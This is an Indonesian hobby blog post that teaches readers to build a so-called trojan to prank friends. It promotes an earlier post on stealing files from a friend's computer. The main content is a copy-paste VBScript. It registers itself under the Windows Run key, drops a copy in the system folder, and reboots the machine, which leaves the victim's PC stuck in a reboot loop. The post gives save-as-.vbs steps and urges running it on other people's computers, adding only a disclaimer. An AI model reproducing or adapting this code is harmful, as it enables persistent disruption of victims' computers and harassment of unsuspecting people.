Home » » CARA BUAT VIRUS TROJAN

CARA BUAT VIRUS TROJAN

Untuk Kali ini baim Masih membahas tentang Masalah Virus ya sobat.! Nah buat sobat yang suka iseng 2 buat sobat temen kamu marah virus yang satu ini bisa buat kita kerjain teman sobat. tapi inget jangan sampai keterlaluan. nah bagi sobat yang mau tau gimana cara buat nya virus trojan ini silahkan simak terus .

Sebelum kita lanjutkan ini adalah pembahasan virus yang ke 3 ya sobat postingan kemaren juga baim sudah share dengan sobat tentang : Cara mencuri File atau dokumen dari komputer teman secara otomatis

Tertarik Untuk mencuri file penting dan kerjain temen.?  Kalo masih tertarik silahkan di lanjutkan baca nya.!

Untuk Bisa membuat Virus Trojan Kita membutuh kan Notepad. Sobat udah tau cara membuka Notpad. Kalo belum tau yuk baim kasih tau cara nya 
  • Pertama Klik Start > All Program > Lalu pilih Assesoris > Notpad
Nah sudah tau kan yuk kita intip cara buat Virus Trojan nya.
  • Pertama buka Notpad Kalo sudah silahkan Copas Code Berikut.
  • set FSobj=CreateObject(“Scripting.FileSystemObject”) set sysDir = FSobj.GetSpecialFolder(1) createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB.vbs” sub createRegKey(regKey,regVal) set regEdit = CreateObject(“WScript.Shell”) regEdit.RegWrite regKey,regVal end sub set generateCopy=FSobj.CreateTextFile(sysDir+”\dlRB.vbs”) generateCopy.close set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1) setFile() fixedCode=replace(fileData,chr(94),”"”") set procreateCopy=FSobj.OpenTextFile(sysDir+”\dlRB.vbs”,2) procreateCopy.write fixedCode procreateCopy.close rebootSystem() function setFile() fileData=”rem – ^dlRB^ by D.L.” &vbcrlf& _ “strComputer = ^.^ ” &vbcrlf& _ “Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _ “& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)” &vbcrlf& _ “Set colOperatingSystems = objWMIService.ExecQuery _ ” &vbcrlf& _ “(^Select * from Win32_OperatingSystem^)” &vbcrlf& _ “For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _ “ObjOperatingSystem.Reboot()” &vbcrlf& _ “Next” end function function rebootSystem() strComputer = “.” Set objWMIService = GetObject(“winmgmts:” _ & “{impersonationLevel=impersonate,(Shutdown)}!\\” & strComputer & “\root\cimv2″) Set colOperatingSystems = objWMIService.ExecQuery _ (“Select * from Win32_OperatingSystem”) For Each objOperatingSystem in colOperatingSystems ObjOperatingSystem.Reboot() Next end function
  • Nah kalo sudah silahkan di save. file nya dengan Nama Basing Yang penting dengan ektensi.vbs
  • Contoh : Baim.VBS
  • Ingat Menyimpan nya Harus All Files.
Jangan di Klik kalau komputer nya milik sobat sendiri. karna kalo sobat klik jangan heran banyak sekali file yang berhamburan.!

Peringatan .! 

Baim atau Situs SHIQUERS.COM tidak bertanggung jawab apabila ada kesalahan dalam bentuk apapun itu di luar tanggung jawab kami. makan nya kalo mau bertindak pikir 2 dulu.  [ Kami hanya memberi pengetahuan saja ]

0 comments:

Post a Comment

 
Lihat : Tentang Blog | Jgn asal copas | Pisi Misi
Copyright ©2012-2015. SHIQUERS.COM - All Rights Reserved
Created By Baim Ahmad
Kebijakan Pripacy Policy